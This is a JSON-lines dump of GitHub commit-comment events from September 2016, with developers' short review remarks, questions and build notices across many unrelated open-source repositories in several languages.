{"id":"4539215093","type":"CommitCommentEvent","actor":{"login":"ParkChanSol"},"repo":{"name":"Johnmacrocraft/MinecraftPEServer"},"payload":{"comment":{"id":18960321,"position":null,"line":null,"path":null,"commit_id":"244da6956aeddcd39dc31499f5f6f8efeab49db9","created_at":"2016-09-09T10:03:45Z","updated_at":"2016-09-09T10:03:45Z","body":"참고 하도록 하겠습니다 :D"}},"created_at":"2016-09-09T10:03:45Z"}
{"id":"4539216831","type":"CommitCommentEvent","actor":{"login":"trevor-vaughan"},"repo":{"name":"simp/pupmod-simp-ssh"},"payload":{"comment":{"id":18960326,"position":7,"line":16,"path":"manifests/client/add_entry.pp","commit_id":"a18deee6610033000628eeffde59797f76b33959","created_at":"2016-09-09T10:04:12Z","updated_at":"2016-09-09T10:04:12Z","body":"The ssh_config(5) reference doesn't make sense here."}},"created_at":"2016-09-09T10:04:12Z"}
{"id":"4539218412","type":"CommitCommentEvent","actor":{"login":"sbahn123"},"repo":{"name":"ElementalKiss/TIL"},"payload":{"comment":{"id":18960331,"position":null,"line":null,"path":null,"commit_id":"394657f627ae58dcdddfd1e09aeb64a195c9c877","created_at":"2016-09-09T10:04:32Z","updated_at":"2016-09-09T10:04:32Z","body":"Oh"}},"created_at":"2016-09-09T10:04:32Z"}
{"id":"4539220899","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18960336,"position":5,"line":126,"path":"applet/src/menu.c","commit_id":"e216df55b50789ab87f720808f808600b75f9fbb","created_at":"2016-09-09T10:05:08Z","updated_at":"2016-09-09T10:05:08Z","body":"https://github.com/travisgoodspeed/md380tools/wiki/Workflow"}},"created_at":"2016-09-09T10:05:08Z"}
{"id":"4539223164","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":18960340,"position":null,"line":null,"path":null,"commit_id":"147096a6a5179da1ff121c7438765cae5f909840","created_at":"2016-09-09T10:05:40Z","updated_at":"2016-09-09T10:05:40Z","body":"#345"}},"created_at":"2016-09-09T10:05:40Z"}
{"id":"4539228256","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18960347,"position":null,"line":null,"path":null,"commit_id":"befeb4baa86128ea51fc2c7c729b01c2c6ad60c4","created_at":"2016-09-09T10:06:54Z","updated_at":"2016-09-09T10:06:54Z","body":"How does this work? I've been writing something like:\r\n\r\n```\r\n<h3 algorithm id=\"whatever\">Foo the |bar|.</h3>\r\n\r\n<ol class=\"algorithm\">\r\n1. Let |toFoo| be |bar|'s <a for=\"bar\">florp</a>.\r\n2. <a>Foo</a> |toFoo|.\r\n</ol>\r\n```\r\n\r\nBut that doesn't produce `data-algorithm` on any wrapper element. What are algorithms supposed to look like in Bikeshed's opinion?"}},"created_at":"2016-09-09T10:06:54Z"}
{"id":"4539229253","type":"CommitCommentEvent","actor":{"login":"andresgnlez"},"repo":{"name":"Vizzuality/TRASE-frontend"},"payload":{"comment":{"id":18960350,"position":null,"line":null,"path":null,"commit_id":"028436c2bf41fe678bfaaf3667b42d33b27b590a","created_at":"2016-09-09T10:07:09Z","updated_at":"2016-09-09T10:07:09Z","body":"Ops, sorry for that! I installed it just for myself when I was testing and I forgot to add it! Nice catch!"}},"created_at":"2016-09-09T10:07:09Z"}
{"id":"4539230292","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18960351,"position":16,"line":599,"path":"bikeshed/__init__.py","commit_id":"82c85ec257d20430690eb03d0cb88aa83f96bdde","created_at":"2016-09-09T10:07:23Z","updated_at":"2016-09-09T10:07:23Z","body":"Thanks!"}},"created_at":"2016-09-09T10:07:23Z"}
{"id":"4539240611","type":"CommitCommentEvent","actor":{"login":"olibre"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18960367,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-09T10:09:49Z","updated_at":"2016-09-09T10:09:49Z","body":"Salut @rom1v \r\n\r\nCela fait plusieurs jours que je réfléchi à ta remarque. Mais je ne comprends pas comment `0x2.8f` pourrait valoir `2.55859375`. De mon point de vue, `0x2.8f` et `2.5` sont exactement les mêmes valeurs, non ?\r\n\r\n**Mes tests `float`/`double` en vieux C++**\r\n\r\n```cpp\r\n#include <iostream>\r\n#include <cassert>\r\n#include <cstdlib>\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n        int numerateur   = argc > 1 ? std::atoi(argv[1]) : 5;\r\n        int denominateur = argc > 2 ? std::atoi(argv[2]) : 2;\r\n\r\n        std::cout << \"fraction = \"<< numerateur <<'/'<< denominateur <<'\\n';\r\n\r\n        double v1 = numerateur;\r\n        v1 /= denominateur;\r\n        float  v2 = v1;\r\n        double v3 = v2;\r\n\r\n        std::cout.precision(99);\r\n        std::cout << v1 <<'\\n';\r\n        std::cout << v2 <<'\\n';\r\n        std::cout << v3 <<'\\n';\r\n        assert(v1 == v2);\r\n        assert(v1 == v3);\r\n}\r\n```\r\n\r\n**Mes résultats**\r\n\r\n```bash\r\n$ g++ float.cpp -Wall -Wextra -pedantic\r\n$ ./a.out                                                                                                \r\nfraction = 5/2\r\n2.5\r\n2.5\r\n2.5\r\no@optioli:/tmp$ ./a.out 1 3\r\nfraction = 1/3\r\n0.333333333333333314829616256247390992939472198486328125\r\n0.3333333432674407958984375\r\n0.3333333432674407958984375\r\na.out: float.cpp:21: int main(int, char**): Assertion `v1 == v2' failed.\r\nAborted (core dumped)\r\n```\r\n"}},"created_at":"2016-09-09T10:09:49Z"}
{"id":"4539247923","type":"CommitCommentEvent","actor":{"login":"noodlez242"},"repo":{"name":"d-mather/42sh"},"payload":{"comment":{"id":18960376,"position":null,"line":null,"path":null,"commit_id":"df0c7550cda10e9bd29a8cf0bd6fc59f860c3c13","created_at":"2016-09-09T10:11:34Z","updated_at":"2016-09-09T10:11:34Z","body":"RAD 😄 "}},"created_at":"2016-09-09T10:11:34Z"}
{"id":"4539249464","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18960379,"position":null,"line":null,"path":null,"commit_id":"39de33e04207d14af4d26b26f9ab916063d94f00","created_at":"2016-09-09T10:11:57Z","updated_at":"2016-09-09T10:11:57Z","body":"review comment"}},"created_at":"2016-09-09T10:11:57Z"}
{"id":"4539249933","type":"CommitCommentEvent","actor":{"login":"meeee"},"repo":{"name":"Barzahlen/grac"},"payload":{"comment":{"id":18960380,"position":null,"line":null,"path":null,"commit_id":"c74329c75524c34725b5857704e6ee2ae53deb56","created_at":"2016-09-09T10:12:05Z","updated_at":"2016-09-09T10:12:05Z","body":"Thanks 😄 "}},"created_at":"2016-09-09T10:12:05Z"}
{"id":"4539249936","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18960381,"position":null,"line":null,"path":null,"commit_id":"39de33e04207d14af4d26b26f9ab916063d94f00","created_at":"2016-09-09T10:12:05Z","updated_at":"2016-09-09T10:12:05Z","body":"revision comment"}},"created_at":"2016-09-09T10:12:05Z"}
{"id":"4539251561","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18960382,"position":107,"line":0,"path":".idea/workspace.xml","commit_id":"39de33e04207d14af4d26b26f9ab916063d94f00","created_at":"2016-09-09T10:12:29Z","updated_at":"2016-09-09T10:12:29Z","body":"diff comment deleted line"}},"created_at":"2016-09-09T10:12:29Z"}
{"id":"4539252943","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18960384,"position":63,"line":0,"path":".idea/workspace.xml","commit_id":"39de33e04207d14af4d26b26f9ab916063d94f00","created_at":"2016-09-09T10:12:50Z","updated_at":"2016-09-09T10:12:50Z","body":"added line comment"}},"created_at":"2016-09-09T10:12:50Z"}
{"id":"4539255947","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18960389,"position":26,"line":0,"path":".idea/workspace.xml","commit_id":"39de33e04207d14af4d26b26f9ab916063d94f00","created_at":"2016-09-09T10:13:31Z","updated_at":"2016-09-09T10:13:31Z","body":"|`line 108`|\n|---|\n108 - folded area"}},"created_at":"2016-09-09T10:13:31Z"}
{"id":"4539258253","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18960394,"position":null,"line":null,"path":null,"commit_id":"39de33e04207d14af4d26b26f9ab916063d94f00","created_at":"2016-09-09T10:14:03Z","updated_at":"2016-09-09T10:14:03Z","body":"@{1c9af813-048b-49f7-8ca2-2066ae0a5940,admin} file comment in not changed file"}},"created_at":"2016-09-09T10:14:03Z"}
{"id":"4539259733","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18960398,"position":4,"line":9,"path":"scss/default.scss","commit_id":"4b2ff99c88d4d9c51f20b2b1a3712bfa87ef6b36","created_at":"2016-09-09T10:14:24Z","updated_at":"2016-09-09T10:14:24Z","body":"Since this is already in WFP UI, you can remove the `box-sizing` overrides from here."}},"created_at":"2016-09-09T10:14:24Z"}
{"id":"4539261714","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18960404,"position":null,"line":null,"path":null,"commit_id":"4b2ff99c88d4d9c51f20b2b1a3712bfa87ef6b36","created_at":"2016-09-09T10:14:53Z","updated_at":"2016-09-09T10:14:53Z","body":"@jrah Since this is already in WFP UI, you can remove the `box-sizing` override from here."}},"created_at":"2016-09-09T10:14:53Z"}
{"id":"4539262245","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"floam/fish-shell"},"payload":{"comment":{"id":18960405,"position":null,"line":null,"path":null,"commit_id":"404c12b7491d5178524d35ee96667df8cbdd815b","created_at":"2016-09-09T10:15:00Z","updated_at":"2016-09-09T10:15:00Z","body":"It was already merged :-/\r\n\r\nWhich of the tests are for functions we don't use? "}},"created_at":"2016-09-09T10:15:00Z"}
{"id":"4539266358","type":"CommitCommentEvent","actor":{"login":"Nicogene"},"repo":{"name":"robotology-playground/Robust-View-Graph-SLAM"},"payload":{"comment":{"id":18960415,"position":null,"line":null,"path":null,"commit_id":"fc264abcb5df301858a29a926983d78dd918450d","created_at":"2016-09-09T10:15:59Z","updated_at":"2016-09-09T10:15:59Z","body":"The previous version was the detector-descriptor crashing combination"}},"created_at":"2016-09-09T10:15:59Z"}
{"id":"4539269304","type":"CommitCommentEvent","actor":{"login":"noerw"},"repo":{"name":"JamesRamm/leaflet-sidenav"},"payload":{"comment":{"id":18960423,"position":null,"line":null,"path":null,"commit_id":"ad6a440288eea4627514f048c6331c7a620a357b","created_at":"2016-09-09T10:16:43Z","updated_at":"2016-09-09T10:16:43Z","body":"nice changes!\r\ndo you plan on maintaining this version yourself?\r\nyou might consider merging/rebasing to the current version from Turbo87, as there were some bugfixes since my fork"}},"created_at":"2016-09-09T10:16:43Z"}
{"id":"4539270293","type":"CommitCommentEvent","actor":{"login":"mitukulavenkatesh"},"repo":{"name":"mitukulavenkatesh/winning"},"payload":{"comment":{"id":18960425,"position":null,"line":null,"path":null,"commit_id":"5c971fc64a85601094c9d6d26973959496d67961","created_at":"2016-09-09T10:16:59Z","updated_at":"2016-09-09T10:16:59Z","body":"k"}},"created_at":"2016-09-09T10:16:59Z"}
{"id":"4539270555","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":18960426,"position":null,"line":null,"path":null,"commit_id":"507255746e3568919e9450a1e9af48f73ef81f59","created_at":"2016-09-09T10:17:02Z","updated_at":"2016-09-09T10:17:02Z","body":"GL for LTC!"}},"created_at":"2016-09-09T10:17:02Z"}
{"id":"4539271380","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18960429,"position":1,"line":1,"path":"xwiki-platform-core/xwiki-platform-help/xwiki-platform-help-ui/src/main/resources/Help/Translations.fr.xml","commit_id":"9822000a38341c4994dc2de667bcb7ef946abd0a","created_at":"2016-09-09T10:17:15Z","updated_at":"2016-09-09T10:17:15Z","body":"This page is not supposed to go in 7.4.x branch."}},"created_at":"2016-09-09T10:17:15Z"}
{"id":"4539271625","type":"CommitCommentEvent","actor":{"login":"GrinningFerret"},"repo":{"name":"TeamOrion/OrionWebsite"},"payload":{"comment":{"id":18960430,"position":null,"line":null,"path":null,"commit_id":"361ea9f92da1f83ebe363792a0db0abe4927df6a","created_at":"2016-09-09T10:17:17Z","updated_at":"2016-09-09T10:17:17Z","body":"No idea why git detected the files as rewritten...."}},"created_at":"2016-09-09T10:17:17Z"}
{"id":"4539275537","type":"CommitCommentEvent","actor":{"login":"iqramroslan"},"repo":{"name":"jotux/Steward-Platform-Forward-Kinematics-Solver"},"payload":{"comment":{"id":18960435,"position":null,"line":null,"path":null,"commit_id":"ad27cf77a0b2e7dd7faecdb0e9de3204ee5ab858","created_at":"2016-09-09T10:18:17Z","updated_at":"2016-09-09T10:18:17Z","body":"i got some problem for stew.m code. i cannot solve the forward kinematic and the image did not animated. do u know why?"}},"created_at":"2016-09-09T10:18:17Z"}
{"id":"4539275537","type":"CommitCommentEvent","actor":{"login":"iqramroslan"},"repo":{"name":"jotux/Steward-Platform-Forward-Kinematics-Solver"},"payload":{"comment":{"id":18960435,"position":null,"line":null,"path":null,"commit_id":"ad27cf77a0b2e7dd7faecdb0e9de3204ee5ab858","created_at":"2016-09-09T10:18:17Z","updated_at":"2016-09-09T10:18:17Z","body":"i got some problem for stew.m code. i cannot solve the forward kinematic and the image did not animated. do u know why?"}},"created_at":"2016-09-09T10:18:17Z"}
{"id":"4539281106","type":"CommitCommentEvent","actor":{"login":"fabiencastan"},"repo":{"name":"poparteu/CCTag"},"payload":{"comment":{"id":18960449,"position":16,"line":14,"path":".travis.yml","commit_id":"a63e3b100bf250e9d2784bbd4903b49395b85062","created_at":"2016-09-09T10:19:43Z","updated_at":"2016-09-09T10:19:43Z","body":"Do you really need to repeat all the dependencies that are already in the default packages list? (L54)"}},"created_at":"2016-09-09T10:19:43Z"}
{"id":"4539285149","type":"CommitCommentEvent","actor":{"login":"swosy"},"repo":{"name":"chartjs/Chart.js"},"payload":{"comment":{"id":18960455,"position":null,"line":null,"path":null,"commit_id":"f665788ae324d6e686b0038ca604b637b571f428","created_at":"2016-09-09T10:20:41Z","updated_at":"2016-09-09T10:20:41Z","body":"just fix the typo (one tab or another ;o)"}},"created_at":"2016-09-09T10:20:41Z"}
{"id":"4539285685","type":"CommitCommentEvent","actor":{"login":"bdionne"},"repo":{"name":"protegeproject/protege-server"},"payload":{"comment":{"id":18960456,"position":22,"line":68,"path":"src/main/java/org/protege/editor/owl/server/http/TokenTable.java","commit_id":"6774356244d3601154b93b4309dd317088806573","created_at":"2016-09-09T10:20:49Z","updated_at":"2016-09-09T10:20:49Z","body":"@johardi - this creates a bug in `AuthenticationHandler`"}},"created_at":"2016-09-09T10:20:49Z"}
{"id":"4539287838","type":"CommitCommentEvent","actor":{"login":"DenisBelobrotski"},"repo":{"name":"DenisBelobrotski/Classwork-02.09.16-"},"payload":{"comment":{"id":18960461,"position":32,"line":26,"path":"src/Projects.java","commit_id":"8bea8ecfd43cff9cd8b3350779899ade4e082892","created_at":"2016-09-09T10:21:19Z","updated_at":"2016-09-09T10:21:19Z","body":"bsfhdhdskfhdsk"}},"created_at":"2016-09-09T10:21:19Z"}
{"id":"4539288201","type":"CommitCommentEvent","actor":{"login":"JohnUrban"},"repo":{"name":"JohnUrban/DBG2OLC"},"payload":{"comment":{"id":18960464,"position":5,"line":5,"path":"utility/split_and_run_sparc.2.sh","commit_id":"bf12b6b616841dec8eb6564d9df5444eeab3ecad","created_at":"2016-09-09T10:21:25Z","updated_at":"2016-09-09T10:21:25Z","body":"Good catch -- I made this quickly for another person who was interested: https://github.com/JohnUrban/DBG2OLC/pull/1\r\n\r\nI personally use the one that allows you to have these functions in your PATH…split_and_run_sparc.path.sh\r\n\r\nI pushed a fix - though I'm sure you fixed it in your own copy. Thanks again."}},"created_at":"2016-09-09T10:21:25Z"}
{"id":"4539291591","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18960473,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T10:22:16Z","updated_at":"2016-09-09T10:22:16Z","body":"I guess there's no easy way to detect whether john supports `--format=all`. I'm just thinking about adjusting john.bash_completion."}},"created_at":"2016-09-09T10:22:16Z"}
{"id":"4539292560","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18960475,"position":5,"line":107,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"73e7712390b7b0e79dd02fbc69c6e24973d599aa","created_at":"2016-09-09T10:22:30Z","updated_at":"2016-09-09T10:22:30Z","body":"No we are not :) Trong is not working on that."}},"created_at":"2016-09-09T10:22:30Z"}
{"id":"4539293606","type":"CommitCommentEvent","actor":{"login":"galaxy119"},"repo":{"name":"DianeOfTheMoon/Roth_UI"},"payload":{"comment":{"id":18960478,"position":null,"line":null,"path":null,"commit_id":"51452f605303551296402ce1602fd4c85440d673","created_at":"2016-09-09T10:22:47Z","updated_at":"2016-09-09T10:22:47Z","body":"I absolutely LOVE your work so far!! Ace does seem fairly easy, so hopefully I'll be able to learn it quickly and help more with that aspect. \r\n\r\nAlso remember, Roth_ShinyBuffs has an options panel already, if it's easier to borrow elements from that, or even just piggy back off of it, you can rename that panel and throw all of Roth's other options into it so everything's centralized. \r\nUp to you how you want to manage it, 2 option panels is fine (one for Roth and one for Roth_ShinyBuffs), so if it's easier to just build your own to work off of that's fine. :D \r\n\r\nAnd we have full permission from zork and Seerah to change anything we want/need in the embeded addons, we can even change the names of or merge some if that makes things easier, so we can get creative. The only exception is ShinyBuffs, we can edit it but we can't merge or rename it beyond adding Roth to the name.\r\n\r\nI'll give this branch a field test and see how everything works tomorrow when I wake up, the code seems solid so I doubt I'll run into any issues. \r\nIf you need/want any help with something let me know, as I said, I don't know Ace yet, but I'm willing to learn, and I've got the time for the moment, and I can help with other stuff like telling you where certain settings are because.. yea.. they are hidden in weird places, lmao."}},"created_at":"2016-09-09T10:22:47Z"}
{"id":"4539294493","type":"CommitCommentEvent","actor":{"login":"mitukulavenkatesh"},"repo":{"name":"mitukulavenkatesh/winning"},"payload":{"comment":{"id":18960481,"position":null,"line":null,"path":null,"commit_id":"5c971fc64a85601094c9d6d26973959496d67961","created_at":"2016-09-09T10:23:00Z","updated_at":"2016-09-09T10:23:00Z","body":"kkkkk"}},"created_at":"2016-09-09T10:23:00Z"}
{"id":"4539296781","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18960486,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T10:23:37Z","updated_at":"2016-09-09T10:23:37Z","body":"Just found an easy way:\r\n```\r\n(bleeding-jumbo)run $ ./john --format=all --list=formats\r\nUnknown ciphertext format name requested\r\n(bleeding-jumbo)run $ echo $?\r\n1\r\n```"}},"created_at":"2016-09-09T10:23:37Z"}
{"id":"4539299998","type":"CommitCommentEvent","actor":{"login":"ne0ark"},"repo":{"name":"TnS-hun/PtpUploader"},"payload":{"comment":{"id":18960498,"position":null,"line":null,"path":null,"commit_id":"edba35ed353876c7134d182a86cb9c6a4ad3c12f","created_at":"2016-09-09T10:24:27Z","updated_at":"2016-09-09T10:24:27Z","body":"This might have broke things now getting  \"doesn't contain any video files\". When trying to resume a duplicate download from the file upload."}},"created_at":"2016-09-09T10:24:27Z"}
{"id":"4539302179","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"floam/fish-shell"},"payload":{"comment":{"id":18960505,"position":null,"line":null,"path":null,"commit_id":"404c12b7491d5178524d35ee96667df8cbdd815b","created_at":"2016-09-09T10:24:58Z","updated_at":"2016-09-09T10:24:58Z","body":"If you mean the result of  the tests aren't used - some of them we are already working around in our code with redundant checks that aren't as good, some are checking things we'd probably be wise to integrate special cases for. I've got a short TODO list of changes to make in response Others I don't know if we need or not. I just added most tests it has that matched things we do which it intends to detect."}},"created_at":"2016-09-09T10:24:58Z"}
{"id":"4539302642","type":"CommitCommentEvent","actor":{"login":"ExSport"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18960506,"position":null,"line":null,"path":null,"commit_id":"f9669b34d7203692aa165c5ec71ecd2c541aa177","created_at":"2016-09-09T10:25:07Z","updated_at":"2016-09-09T10:25:07Z","body":"@Sami32 Does it have side effects?\r\nDon't know this code but quick look there I see that enabling Audio resampling will also do downconverting to STEREO only. I should expect that FLAC, OGG, AC3 and also MP3 supports multichannels [https://en.wikipedia.org/wiki/MP3_Surround]\r\nUser should not expect that his multichannel FLAC, OGG or DTS/AC3 audio with enabled resampling will be downconverted to STEREO only.\r\nBut as I said I don't know the code and quick check was on mobile:)\r\nMaybe @SubJunk or @valib will know more here..."}},"created_at":"2016-09-09T10:25:07Z"}
{"id":"4539305723","type":"CommitCommentEvent","actor":{"login":"distributev"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18960511,"position":null,"line":null,"path":null,"commit_id":"9683a587e28f96f470a304f3c8edc5a466422374","created_at":"2016-09-09T10:25:52Z","updated_at":"2016-09-09T10:25:52Z","body":"Where is ng-node-compile used? I thought templates are evaluated again on server - the client interpolation being only to show in the GUI.\r\n\r\nOtherwise how the CSV import will work correctly for  'html_permalink', 'pdf_permalink' and 'zip_permalink' since there is no GUI involved when doing CSV import."}},"created_at":"2016-09-09T10:25:52Z"}
{"id":"4539305993","type":"CommitCommentEvent","actor":{"login":"GrinningFerret"},"repo":{"name":"TeamOrion/OrionWebsite"},"payload":{"comment":{"id":18960512,"position":null,"line":null,"path":null,"commit_id":"63a6152b3a688f493a79fb7dc60facd42d2fca70","created_at":"2016-09-09T10:25:56Z","updated_at":"2016-09-09T10:25:56Z","body":"No idea why Git detected the files as rewritten..."}},"created_at":"2016-09-09T10:25:56Z"}
{"id":"4539313073","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18960529,"position":null,"line":null,"path":null,"commit_id":"e00ae89a0d46b3f0716d84060d0e59211df2ddda","created_at":"2016-09-09T10:27:45Z","updated_at":"2016-09-09T10:27:45Z","body":"Better would be to adjust the `--list=hidden-options` output for\r\n`--format=CLASS             valid classes: dynamic, cpu`\r\nand mention format class all in some document.\r\n\r\nBTW: I like the idea of being able to test everything, ignoring config. "}},"created_at":"2016-09-09T10:27:45Z"}
{"id":"4539314705","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18960535,"position":14,"line":178,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-09T10:28:11Z","updated_at":"2016-09-09T10:28:11Z","body":"Ah, no.\n\nCan we avoid putting anything in the header of the html page?\n\nIts quite hard to do in a CMS.\n\nOn 9 Sep 2016 10:00 p.m., \"Max V\" <max@onebro.me> wrote:\n\n> Ok, you win.\n>\n> On 9 Sep 2016 7:47 p.m., \"Ehsan Afzali\" <notifications@github.com> wrote:\n>\n>> It's possible if we write our own wrapper around Swiper and then ask\n>> users to include that. and we do all that stuff there. But I guess this\n>> approach is much better and customizable for user. They'll catch the idea\n>> and can use whichever library they want and also they can manage their\n>> dependencies themselves.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/hubsy-io/timelapse/commit/6cdabc48ff36826f18d5c106abeabedada461dc0#commitcomment-18958980>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AFpsjJlmH_tA1Gq2RbQ-PCFMWILZBSr_ks5qoQ8BgaJpZM4J3ZbV>\n>> .\n>>\n>\n"}},"created_at":"2016-09-09T10:28:11Z"}
{"id":"4539315589","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18960538,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-09T10:28:24Z","updated_at":"2016-09-09T10:28:24Z","body":"Sounds goods but I'm not sure EndpointAdress could be the same for Token and MID.\r\n\r\nAs I understand DTLS and CoAP spec, there is not so much ambiguity. :\r\nMessageID and token correlation should be done using :\r\n   - address+port  for UDP\r\n   - address+port + session + epoch for DTLS.\r\n\r\nThe problem is about CoAP observe (and maybe for not piggyback response). This concerns only token correlation. We see this constraint prevent to use observe behind a NAT.\r\nThat's why there is discussion about this at IETF and OMA to see if this limitation could not be relaxed.\r\nIn Californium, we already begin to develop a strict and relax mode (with `CorrelationContext`).\r\nThe strict mode (should be?) the definition spec:\r\n   - address+port + session + epoch for DTLS.\r\nThe relax mode which seems acceptable but out of spec:\r\n   - session + cypher suite\r\n\r\nDoes it make sense ?\r\n"}},"created_at":"2016-09-09T10:28:24Z"}
{"id":"4539315915","type":"CommitCommentEvent","actor":{"login":"unintendedbear"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18960541,"position":null,"line":null,"path":null,"commit_id":"6e8b9658b8c20cd29cd67a92c4a4141ab2ab2211","created_at":"2016-09-09T10:28:29Z","updated_at":"2016-09-09T10:28:29Z","body":"OMG sorry, in:\r\n\r\n% 23 are in the 'print-run' form\r\n\r\nObviously I meant 'print run' form. Without the dash.\r\nSorry sorry T____T"}},"created_at":"2016-09-09T10:28:29Z"}
{"id":"4539318213","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18960545,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-09T10:29:04Z","updated_at":"2016-09-09T10:29:04Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.268.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76799&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:42"}},"created_at":"2016-09-09T10:29:04Z"}
{"id":"4539323288","type":"CommitCommentEvent","actor":{"login":"Leits"},"repo":{"name":"ivanromakh/openprocurement.tender.limited"},"payload":{"comment":{"id":18960556,"position":11,"line":31,"path":"openprocurement/tender/limited/models.py","commit_id":"7ac264482d31fc50984cfe77f609ee8fe2c2d53f","created_at":"2016-09-09T10:30:20Z","updated_at":"2016-09-09T10:30:20Z","body":"І 4 пробіли замість 1 табу."}},"created_at":"2016-09-09T10:30:20Z"}
{"id":"4539330100","type":"CommitCommentEvent","actor":{"login":"skconsulting"},"repo":{"name":"phandp/ild-cnn"},"payload":{"comment":{"id":18960585,"position":37,"line":54,"path":"python/README.md","commit_id":"8dc8c7d7a3b0737fc2df862ac0a0b3cc301a3143","created_at":"2016-09-09T10:31:59Z","updated_at":"2016-09-09T10:31:59Z","body":"predict_file.py"}},"created_at":"2016-09-09T10:31:59Z"}
{"id":"4539334745","type":"CommitCommentEvent","actor":{"login":"rom1v"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18960590,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-09T10:33:11Z","updated_at":"2016-09-09T10:33:11Z","body":"> De mon point de vue, `0x2.8f` et `2.5f` sont exactement les mêmes valeurs, non ?\r\n\r\nNon car `f` est un digit valide en hexa.\r\n\r\nDu coup, `2.8f` vaut `0x2`×16^0 + `0x8`×16^(-1) + `0xf`×16^(-2)."}},"created_at":"2016-09-09T10:33:11Z"}
{"id":"4539337434","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18960595,"position":12,"line":12,"path":"lesson5/module.rb","commit_id":"55e81b030f8e748c152acfc297a47f81ca7a7f77","created_at":"2016-09-09T10:33:50Z","updated_at":"2016-09-09T10:33:50Z","body":"А зачем делать приватный аксессор и потом писать публичные геттер и сеттер? Ведь достаоочно просто сделать аксессор публичным и больше ничего писать будет не нужно"}},"created_at":"2016-09-09T10:33:50Z"}
{"id":"4539338166","type":"CommitCommentEvent","actor":{"login":"swergas"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":18960596,"position":4,"line":4,"path":"assembl/static/js/app/views/confirmModal.js","commit_id":"79f9bf52f7ea6b758e379960b5aeca30a1987015","created_at":"2016-09-09T10:34:01Z","updated_at":"2016-09-09T10:34:01Z","body":"Thanks and sorry for not seing the error! I have just commited a fix."}},"created_at":"2016-09-09T10:34:01Z"}
